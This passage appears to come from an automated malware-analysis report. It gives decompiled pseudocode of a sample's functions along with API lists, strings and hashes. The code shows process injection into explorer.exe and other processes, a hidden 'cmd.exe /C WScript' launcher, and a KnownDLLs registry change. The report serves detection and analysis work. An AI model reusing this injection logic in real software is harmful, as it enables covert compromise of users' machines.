				long _v64;
				long _v68;
				long _v72;
				long _v76;
				char _v80;
				void* _t112;
				void* _t115;
				CHAR* _t118;
				CHAR* _t119;
				CHAR* _t129;
				signed short _t132;
				CHAR* _t134;
				_Unknown_base(*)()* _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				CHAR* _t138;
				CHAR* _t141;
				CHAR* _t142;
				CHAR* _t147;
				void* _t149;
				CHAR* _t150;
				void* _t164;
				CHAR** _t165;
				void* _t168;
				void* _t170;
				struct HINSTANCE__* _t176;
				CHAR* _t177;
				signed int _t178;
				CHAR* _t180;
				signed int _t185;
				CHAR* _t188;
				_Unknown_base(*)()** _t190;
				intOrPtr _t192;
				CHAR* _t193;
				CHAR* _t195;
				intOrPtr* _t196;
				void* _t198;
				signed short* _t199;
				CHAR** _t201;
				char _t202;
				void* _t204;
				void* _t205;
				void* _t208;

				_t186 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v48 = 0;
				_v44 = 0;
				 *_a20 = 0;
				_t196 =  *0x37a1094(_a4);
				_v40 = _t196;
				if( *_t196 != 0x4550) {
					L5:
					return 0;
				} else {
					_v28 =  *((intOrPtr*)(_t196 + 0x50));
					_v56 = _a8;
					_v80 = 0x18;
					_v76 = 0;
					_v68 = 0;
					_v72 = 0;
					_v64 = 0;
					_v60 = 0;
					_v52 = 0;
					_t112 =  *0x37a1098( &_v8, 0x1fffff,  &_v80,  &_v56);
					if(_t112 != 0) {
						goto L5;
					} else {
						_t208 =  *0x37a1314 - _t112; // 0x1
						if(_t208 == 0) {
							L6:
							_t115 =  *0x37a10a8(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40);
							__eflags = _t115;
							if(_t115 != 0) {
								goto L4;
							} else {
								_t170 = VirtualAlloc(_t115, _v28, 0x3000, 0x40);
								__eflags = _t170;
								if(_t170 == 0) {
									L43:
									__eflags = _v12;
									if(_v12 != 0) {
										 *0x37a10ac(_v8,  &_v12,  &_v20, 0x8000);
									}
									_t118 = _v8;
									__eflags = _t118;
									if(_t118 != 0) {
										 *0x37a1088(_t118);
										_t118 = _v8;
									}
									__eflags = _t170;
									if(_t170 != 0) {
										VirtualFree(_t170, 0, 0x8000);
										_t118 = _v8;
									}
									__eflags = _v24;
									_v20 = 0;
									if(_v24 != 0) {
										 *0x37a10ac(_t118,  &_v24,  &_v20, 0x8000);
									}
									_t119 = _v16;
									__eflags = _t119;
									if(_t119 != 0) {
										 *0x37a1088(_t119);
									}
									__eflags = 0;
									return 0;
								} else {
									E035D1640(_t170, _t186, _v28);
									_t205 = _t204 + 0xc;
									_t188 =  *((intOrPtr*)(_t196 + 0x80)) + _t170;
									__eflags = _t188;
									while(1) {
										_t129 = _t188[0xc];
										_v32 = _t188;
										__eflags = _t129;
										if(_t129 != 0) {
											goto L11;
										}
										__eflags = _t188[4] - _t129;
										if(_t188[4] == _t129) {
											_t136 = _v40;
											_t177 = _v12;
											_t192 = _a4;
											_t45 = _t136 + 0xa0; // 0x45dd842a
											_t46 = _t136 + 0x34; // 0x0
											_t137 =  *_t46;
											_t201 =  *_t45 + _t170;
											_v40 = _t177 - _t137;
											__eflags =  *_t201;
											_v36 = _t192 - _t137;
											if( *_t201 != 0) {
												do {
													_t193 = _t201[1];
													_t50 =  &(_t201[1]); // 0x45dd842e
													_t165 = _t50;
													_v32 = _t165;
													__eflags = _t193 - 8;
													if(_t193 >= 8) {
														_t185 = 0;
														_t195 =  &(_t193[0xfffffffffffffff8]) >> 1;
														__eflags = _t195;
														if(_t195 != 0) {
															asm("o16 nop [eax+eax]");
															do {
																_t178 =  *(_t201 + 8 + _t185 * 2) & 0x0000ffff;
																__eflags = _t178;
																if(_t178 != 0) {
																	_t180 =  &(( *_t201)[_t178 & 0x00000fff]);
																	_t57 =  &(_t180[_t170]);
																	 *_t57 = _t180[_t170] + _v40 - _v36;
																	__eflags =  *_t57;
																}
																_t185 = _t185 + 1;
																__eflags = _t185 - _t195;
															} while (_t185 < _t195);
															_t165 = _v32;
														}
													}
													_t201 = _t201 +  *_t165;
													__eflags =  *_t201;
												} while ( *_t201 != 0);
												_t177 = _v12;
												_t192 = _a4;
											}
											_t138 =  *0x37a109c(_v8, _t177, _t170, _v28, 0);
											__eflags = _t138;
											if(_t138 < 0) {
												goto L43;
											} else {
												_t202 = _a16;
												_t141 =  *0x37a10a8(_v8,  &_v24, 0,  &_a16, 0x3000, 4);
												__eflags = _t141;
												if(_t141 != 0) {
													goto L43;
												} else {
													_t142 =  *0x37a109c(_v8, _v24, _a12, _t202, _t141);
													__eflags = _t142;
													if(_t142 < 0) {
														goto L43;
													} else {
														_t147 =  *0x37a10a0(_v8, 0, 0, 0, 0, 0, _v12 - _t192 + _a24, _v24,  &_v16, 0);
														__eflags = _t147;
														if(_t147 < 0) {
															goto L43;
														} else {
															asm("xorps xmm0, xmm0");
															asm("movlpd [ebp-0x2c], xmm0");
															_t149 =  *0x37a10a4(_v16, 0,  &_v48);
															__eflags = _t149 - 0x102;
															if(_t149 == 0x102) {
																while(1) {
																	__eflags =  *0x37a2118;
																	if( *0x37a2118 != 0) {
																		break;
																	}
																	Sleep(0xbb8);
																	_t164 =  *0x37a10a4(_v16, 0,  &_v48);
																	__eflags = _t164 - 0x102;
																	if(_t164 == 0x102) {
																		continue;
																	} else {
																	}
																	goto L41;
																}
																TerminateThread(_v16, 0);
															}
															L41:
															_t150 = GetExitCodeThread(_v16, _a20);
															__eflags = _t150;
															if(_t150 == 0) {
																goto L43;
															} else {
																 *0x37a1088(_v16);
																 *0x37a10ac(_v8,  &_v12,  &_v20, 0x8000);
																 *0x37a1088(_v8);
																VirtualFree(_t170, 0, 0x8000);
																_v20 = 0;
																 *0x37a10ac(_v8,  &_v24,  &_v20, 0x8000);
																return 1;
															}
														}
													}
												}
											}
										} else {
											goto L11;
										}
										goto L54;
										L11:
										_t176 = E035D8B00( &(_t129[_t170]));
										_t205 = _t205 + 4;
										_v36 = _t176;
										__eflags = _t176;
										if(_t176 == 0) {
											goto L43;
										} else {
											_t198 = _t170 +  *_t188;
											_t190 = _t170 + _t188[0x10];
											__eflags = _t198 - _t170;
											_t199 =  ==  ? _t190 : _t198;
											__eflags = _t199 - _t170;
											if(_t199 == _t170) {
												goto L43;
											} else {
												_t132 =  *_t199;
												__eflags = _t132;
												if(__eflags == 0) {
													L19:
													_t188 =  &(_v32[0x14]);
													continue;
												} else {
													L14:
													L14:
													if(__eflags >= 0) {
														_t134 = _t132 + 2 + _t170;
														__eflags = _t134;
													} else {
														_t134 = _t132 & 0x0000ffff;
													}
													_t135 = GetProcAddress(_t176, _t134);
													 *_t190 = _t135;
													__eflags = _t135;
													if(_t135 == 0) {
														goto L43;
													}
													_t132 = _t199[2];
													_t199 =  &(_t199[2]);
													_t176 = _v36;
													_t190 = _t190 + 4;
													__eflags = _t132;
													if(__eflags != 0) {
														goto L14;
													} else {
														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t168 = E035D8270(__ecx, _v8);
							_t204 = _t204 + 4;
							if(_t168 != 0) {
								goto L6;
							} else {
								L4:
								 *0x37a1088(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}




























































                                                                                                                                          0x035d29eb
                                                                                                                                          0x035d29ef
                                                                                                                                          0x035d29f6
                                                                                                                                          0x035d29fd
                                                                                                                                          0x035d2a04
                                                                                                                                          0x035d2a0b
                                                                                                                                          0x035d2a12
                                                                                                                                          0x035d2a19
                                                                                                                                          0x035d2a20
                                                                                                                                          0x035d2a27
                                                                                                                                          0x035d2a33
                                                                                                                                          0x035d2a35
                                                                                                                                          0x035d2a3e
                                                                                                                                          0x035d2ab9
                                                                                                                                          0x035d2abf
                                                                                                                                          0x035d2a40
                                                                                                                                          0x035d2a43
                                                                                                                                          0x035d2a49
                                                                                                                                          0x035d2a53
                                                                                                                                          0x035d2a63
                                                                                                                                          0x035d2a6b
                                                                                                                                          0x035d2a72
                                                                                                                                          0x035d2a79
                                                                                                                                          0x035d2a80
                                                                                                                                          0x035d2a87
                                                                                                                                          0x035d2a8e
                                                                                                                                          0x035d2a96
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2a98
                                                                                                                                          0x035d2a98
                                                                                                                                          0x035d2a9e
                                                                                                                                          0x035d2ac0
                                                                                                                                          0x035d2ad4
                                                                                                                                          0x035d2ada
                                                                                                                                          0x035d2adc
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2ade
                                                                                                                                          0x035d2af0
                                                                                                                                          0x035d2af2
                                                                                                                                          0x035d2af4
                                                                                                                                          0x035d2d49
                                                                                                                                          0x035d2d49
                                                                                                                                          0x035d2d4d
                                                                                                                                          0x035d2d5f
                                                                                                                                          0x035d2d5f
                                                                                                                                          0x035d2d65
                                                                                                                                          0x035d2d68
                                                                                                                                          0x035d2d6a
                                                                                                                                          0x035d2d6d
                                                                                                                                          0x035d2d73
                                                                                                                                          0x035d2d73
                                                                                                                                          0x035d2d76
                                                                                                                                          0x035d2d78
                                                                                                                                          0x035d2d82
                                                                                                                                          0x035d2d88
                                                                                                                                          0x035d2d88
                                                                                                                                          0x035d2d8b
                                                                                                                                          0x035d2d8f
                                                                                                                                          0x035d2d96
                                                                                                                                          0x035d2da6
                                                                                                                                          0x035d2da6
                                                                                                                                          0x035d2dac
                                                                                                                                          0x035d2daf
                                                                                                                                          0x035d2db1
                                                                                                                                          0x035d2db4
                                                                                                                                          0x035d2db4
                                                                                                                                          0x035d2dbc
                                                                                                                                          0x035d2dc2
                                                                                                                                          0x035d2afa
                                                                                                                                          0x035d2aff
                                                                                                                                          0x035d2b0a
                                                                                                                                          0x035d2b0d
                                                                                                                                          0x035d2b0d
                                                                                                                                          0x035d2b0f
                                                                                                                                          0x035d2b0f
                                                                                                                                          0x035d2b12
                                                                                                                                          0x035d2b15
                                                                                                                                          0x035d2b17
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b19
                                                                                                                                          0x035d2b1c
                                                                                                                                          0x035d2b88
                                                                                                                                          0x035d2b8b
                                                                                                                                          0x035d2b90
                                                                                                                                          0x035d2b93
                                                                                                                                          0x035d2b99
                                                                                                                                          0x035d2b99
                                                                                                                                          0x035d2b9c
                                                                                                                                          0x035d2ba0
                                                                                                                                          0x035d2ba7
                                                                                                                                          0x035d2baa
                                                                                                                                          0x035d2bad
                                                                                                                                          0x035d2bb0
                                                                                                                                          0x035d2bb0
                                                                                                                                          0x035d2bb3
                                                                                                                                          0x035d2bb3
                                                                                                                                          0x035d2bb6
                                                                                                                                          0x035d2bb9
                                                                                                                                          0x035d2bbc
                                                                                                                                          0x035d2bc1
                                                                                                                                          0x035d2bc6
                                                                                                                                          0x035d2bc6
                                                                                                                                          0x035d2bc8
                                                                                                                                          0x035d2bca
                                                                                                                                          0x035d2bd0
                                                                                                                                          0x035d2bd0
                                                                                                                                          0x035d2bd5
                                                                                                                                          0x035d2bd8
                                                                                                                                          0x035d2be3
                                                                                                                                          0x035d2be8
                                                                                                                                          0x035d2be8
                                                                                                                                          0x035d2be8
                                                                                                                                          0x035d2be8
                                                                                                                                          0x035d2beb
                                                                                                                                          0x035d2bec
                                                                                                                                          0x035d2bec
                                                                                                                                          0x035d2bf0
                                                                                                                                          0x035d2bf0
                                                                                                                                          0x035d2bc8
                                                                                                                                          0x035d2bf3
                                                                                                                                          0x035d2bf5
                                                                                                                                          0x035d2bf5
                                                                                                                                          0x035d2bfa
                                                                                                                                          0x035d2bfd
                                                                                                                                          0x035d2bfd
                                                                                                                                          0x035d2c0a
                                                                                                                                          0x035d2c10
                                                                                                                                          0x035d2c12
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2c18
                                                                                                                                          0x035d2c18
                                                                                                                                          0x035d2c2f
                                                                                                                                          0x035d2c35
                                                                                                                                          0x035d2c37
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2c3d
                                                                                                                                          0x035d2c48
                                                                                                                                          0x035d2c4e
                                                                                                                                          0x035d2c50
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2c56
                                                                                                                                          0x035d2c75
                                                                                                                                          0x035d2c7b
                                                                                                                                          0x035d2c7d
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2c83
                                                                                                                                          0x035d2c86
                                                                                                                                          0x035d2c8f
                                                                                                                                          0x035d2c94
                                                                                                                                          0x035d2c9a
                                                                                                                                          0x035d2c9f
                                                                                                                                          0x035d2ca7
                                                                                                                                          0x035d2cac
                                                                                                                                          0x035d2cae
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2cb5
                                                                                                                                          0x035d2cc0
                                                                                                                                          0x035d2cc6
                                                                                                                                          0x035d2ccb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2ccd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2ccb
                                                                                                                                          0x035d2cd4
                                                                                                                                          0x035d2cd4
                                                                                                                                          0x035d2cda
                                                                                                                                          0x035d2ce0
                                                                                                                                          0x035d2ce6
                                                                                                                                          0x035d2ce8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2cea
                                                                                                                                          0x035d2ced
                                                                                                                                          0x035d2d03
                                                                                                                                          0x035d2d0c
                                                                                                                                          0x035d2d1a
                                                                                                                                          0x035d2d28
                                                                                                                                          0x035d2d37
                                                                                                                                          0x035d2d48
                                                                                                                                          0x035d2d48
                                                                                                                                          0x035d2ce8
                                                                                                                                          0x035d2c7d
                                                                                                                                          0x035d2c50
                                                                                                                                          0x035d2c37
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b1e
                                                                                                                                          0x035d2b26
                                                                                                                                          0x035d2b28
                                                                                                                                          0x035d2b2b
                                                                                                                                          0x035d2b2e
                                                                                                                                          0x035d2b30
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b36
                                                                                                                                          0x035d2b3b
                                                                                                                                          0x035d2b3d
                                                                                                                                          0x035d2b3f
                                                                                                                                          0x035d2b41
                                                                                                                                          0x035d2b44
                                                                                                                                          0x035d2b46
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b4c
                                                                                                                                          0x035d2b4c
                                                                                                                                          0x035d2b4e
                                                                                                                                          0x035d2b50
                                                                                                                                          0x035d2b80
                                                                                                                                          0x035d2b83
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b52
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b52
                                                                                                                                          0x035d2b52
                                                                                                                                          0x035d2b5c
                                                                                                                                          0x035d2b5c
                                                                                                                                          0x035d2b54
                                                                                                                                          0x035d2b54
                                                                                                                                          0x035d2b54
                                                                                                                                          0x035d2b60
                                                                                                                                          0x035d2b66
                                                                                                                                          0x035d2b68
                                                                                                                                          0x035d2b6a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b70
                                                                                                                                          0x035d2b73
                                                                                                                                          0x035d2b76
                                                                                                                                          0x035d2b79
                                                                                                                                          0x035d2b7c
                                                                                                                                          0x035d2b7e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b7e
                                                                                                                                          0x035d2b50
                                                                                                                                          0x035d2b46
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b30
                                                                                                                                          0x035d2b0f
                                                                                                                                          0x035d2af4
                                                                                                                                          0x035d2aa0
                                                                                                                                          0x035d2aa3
                                                                                                                                          0x035d2aa8
                                                                                                                                          0x035d2aad
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2aaf
                                                                                                                                          0x035d2aaf
                                                                                                                                          0x035d2ab2
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2ab2
                                                                                                                                          0x035d2aad
                                                                                                                                          0x035d2a9e
                                                                                                                                          0x035d2a96
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 035D2AEA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 035D2B60
                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 035D2CB5
                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 035D2CE0
                                                                                                                                            • Part of subcall function 035D8270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,035D3432), ref: 035D8285
                                                                                                                                            • Part of subcall function 035D8270: GetProcAddress.KERNEL32(00000000,?,?,035D3432), ref: 035D828C
                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 035D2CD4
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D2D1A
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D2D82
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AddressFreeProcThread$AllocCodeExitHandleModuleSleepTerminate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 844144628-0
                                                                                                                                          • Opcode ID: f13654a9695a2c416de422819898f0daaeaa92cd66a0d938d1248682550e764c
                                                                                                                                          • Instruction ID: baa4a74ff3ef90507b4aea2a27d1ffa2ed3ff211fdee1123ad9a365e6b5b1a5d
                                                                                                                                          • Opcode Fuzzy Hash: f13654a9695a2c416de422819898f0daaeaa92cd66a0d938d1248682550e764c
                                                                                                                                          • Instruction Fuzzy Hash: 15C15A71A00209EFEB20DF99EC45BEEBBB9FF44300F144469E905E7260D775AA45DBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D37E0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 127memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7ED0: GetFileAttributesW.KERNEL32(?,?,035D31D3,035D47C4,035D47C4,\System32\wuapp.exe,035D47C4,?,00000000), ref: 035D7ED6
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 035D38CD
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 035D3900
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D3942
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D3986
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$FileFree$AllocAttributesSize
                                                                                                                                          • String ID: 0125789244697858$@
                                                                                                                                          • API String ID: 1658238082-3353267005
                                                                                                                                          • Opcode ID: 86ca85a0104d6b8600516fcb58f7db91ad2b496c02b75559cf1231df78549256
                                                                                                                                          • Instruction ID: 5d2a88e3fef1670e17d96e80727be3cba25a02fe96d4c239b2bb9b801365dd4d
                                                                                                                                          • Opcode Fuzzy Hash: 86ca85a0104d6b8600516fcb58f7db91ad2b496c02b75559cf1231df78549256
                                                                                                                                          • Instruction Fuzzy Hash: 19415975E41218EAFB20DF94EC09FDEBBB8BB04705F104155FA05B92D0E7B55A088BA5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D8450, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100sleepthreadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                          			E035D8450(char* __ecx, void* __eflags) {
				char _v8;
				char _v1032;
				char _v1036;
				long _v1040;
				char _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				signed int _t41;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;

				_t37 = __ecx;
				E035D1BB0( &_v5136, 0, 0x1000);
				E035D1BB0( &_v1036, 0, 0x404);
				E035D1670( &_v1036, 0, 0x404);
				_v1036 = GetCurrentProcessId();
				E035D1A00( &_v1032, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
				_t46 = _t44 + 0x2c;
				_push(_t35);
				_push(_t41);
				_push(_t39);
				L1:
				while(1) {
					if( *0x37a1314 == 0) {
						_t24 = E035D7EF0("explorer.exe");
						_t47 = _t46 + 4;
						if(_t24 != 0) {
							_t37 =  &_v1036;
							E035D29E0( &_v1036, 0x35d0000, _t24,  &_v1036, 0x404,  &_v8, E035D8390);
							_t46 = _t47 + 0x18;
							goto L12;
						}
					} else {
						_v1040 = 0;
						_t35 = E035D80E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000);
						_t46 = _t46 + 0xc;
						if(_t35 != 0) {
							_t41 = 0;
							if(_t35 != 0) {
								while( *0x37a2118 == 0) {
									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
										L8:
										_t41 = _t41 + 1;
										if(_t41 < _t35) {
											continue;
										} else {
										}
									} else {
										_t34 = E035D29E0(_t37, 0x35d0000, _t39,  &_v1036, 0x404,  &_v8, E035D8390);
										_t46 = _t46 + 0x18;
										if(_t34 == 0) {
											goto L8;
										}
									}
									goto L12;
								}
							}
							L12:
							if( *0x37a2118 != 0) {
								ExitThread(0);
							}
							Sleep(0x1f4);
							continue;
						}
					}
					return 0;
				}
			}




















                                                                                                                                          0x035d8450
                                                                                                                                          0x035d8467
                                                                                                                                          0x035d847a
                                                                                                                                          0x035d848d
                                                                                                                                          0x035d849b
                                                                                                                                          0x035d84ad
                                                                                                                                          0x035d84b2
                                                                                                                                          0x035d84b5
                                                                                                                                          0x035d84b6
                                                                                                                                          0x035d84b7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d84c0
                                                                                                                                          0x035d84c7
                                                                                                                                          0x035d8552
                                                                                                                                          0x035d8557
                                                                                                                                          0x035d855c
                                                                                                                                          0x035d856c
                                                                                                                                          0x035d8579
                                                                                                                                          0x035d857e
                                                                                                                                          0x00000000
                                                                                                                                          0x035d857e
                                                                                                                                          0x035d84cd
                                                                                                                                          0x035d84d8
                                                                                                                                          0x035d84ea
                                                                                                                                          0x035d84ec
                                                                                                                                          0x035d84f1
                                                                                                                                          0x035d84f7
                                                                                                                                          0x035d84fb
                                                                                                                                          0x035d8501
                                                                                                                                          0x035d850a
                                                                                                                                          0x035d8513
                                                                                                                                          0x035d8546
                                                                                                                                          0x035d8546
                                                                                                                                          0x035d8549
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d854b
                                                                                                                                          0x035d851f
                                                                                                                                          0x035d853a
                                                                                                                                          0x035d853f
                                                                                                                                          0x035d8544
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8544
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8513
                                                                                                                                          0x035d8501
                                                                                                                                          0x035d8581
                                                                                                                                          0x035d8588
                                                                                                                                          0x035d859c
                                                                                                                                          0x035d859c
                                                                                                                                          0x035d858f
                                                                                                                                          0x00000000
                                                                                                                                          0x035d858f
                                                                                                                                          0x035d84f1
                                                                                                                                          0x035d85aa
                                                                                                                                          0x035d85aa

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe, xrefs: 035D84A7
                                                                                                                                          • explorer.exe, xrefs: 035D854D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentProcess$ExitSleepThread
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$explorer.exe
                                                                                                                                          • API String ID: 970816010-4081113559
                                                                                                                                          • Opcode ID: 18ffbaae59923a7273dfdad716b3bf4ce92827b1998788d72da6ec98d1bacca4
                                                                                                                                          • Instruction ID: 57ac25266e51a0f52e5ca9af53b04f235ed7acccfb1b03e008e2932e304893de
                                                                                                                                          • Opcode Fuzzy Hash: 18ffbaae59923a7273dfdad716b3bf4ce92827b1998788d72da6ec98d1bacca4
                                                                                                                                          • Instruction Fuzzy Hash: 7C31DDB9940304BAE730FB98FD46FEA737CB744741F4440A4EB09B61A2E770968987B5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D6CA0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49threadprocessCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E035D6CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;
				long _t25;

				E035D1BB0( &_v88, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");
				E035D1A00( &_v1128, L"cmd.exe /C WScript \"");
				E035D1970( &_v1128, _a4 - 0xffffff80);
				E035D1970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					ExitThread(_v20.dwProcessId);
				}
				ExitThread(_t25);
			}







                                                                                                                                          0x035d6cb1
                                                                                                                                          0x035d6cbc
                                                                                                                                          0x035d6cc5
                                                                                                                                          0x035d6cc9
                                                                                                                                          0x035d6cdc
                                                                                                                                          0x035d6ced
                                                                                                                                          0x035d6d15
                                                                                                                                          0x035d6d1d
                                                                                                                                          0x035d6d29
                                                                                                                                          0x035d6d32
                                                                                                                                          0x035d6d3b
                                                                                                                                          0x035d6d3b
                                                                                                                                          0x035d6d20

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 035D6D15
                                                                                                                                          • ExitThread.KERNEL32 ref: 035D6D20
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 035D6D29
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 035D6D32
                                                                                                                                          • ExitThread.KERNEL32 ref: 035D6D3B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleThread$CreateProcess
                                                                                                                                          • String ID: cmd.exe /C WScript "
                                                                                                                                          • API String ID: 3397019416-3599441821
                                                                                                                                          • Opcode ID: b43eb41dd87dd03174c5aa645aada6cc6f82453f5aabf3833130942dd9d72351
                                                                                                                                          • Instruction ID: 8e585fe0c6222b104ff155d20d2fd647c19de1dc1289d816e7b375749c86ee3a
                                                                                                                                          • Opcode Fuzzy Hash: b43eb41dd87dd03174c5aa645aada6cc6f82453f5aabf3833130942dd9d72351
                                                                                                                                          • Instruction Fuzzy Hash: 9C118BB194030CBADB20EBE4ED49F9E777CBF09700F100150B205E90A5E771A698CB55
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D2DD0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D2DD0(void* __ecx) {
				void* _v8;
				long _t8;

				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f,  &_v8);
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E035D1B40(L"ntdll.dll") * 2);
					return RegCloseKey(_v8);
				}
				return _t8;
			}





                                                                                                                                          0x035d2dd7
                                                                                                                                          0x035d2df0
                                                                                                                                          0x035d2df8
                                                                                                                                          0x035d2e20
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2e29
                                                                                                                                          0x035d2e32

                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,035D2F21), ref: 035D2DF0
                                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 035D2E20
                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 035D2E29
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                          • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                                                          • API String ID: 779948276-834112533
                                                                                                                                          • Opcode ID: 405421778b5508f18edbfefd9d6ea1df1ab5ec568141cf9e0783b4aa379c08a8
                                                                                                                                          • Instruction ID: c0310b9417e8847b9097c88113948bcc8bb4122fcb32774ec40f1f9a8e2a6dcc
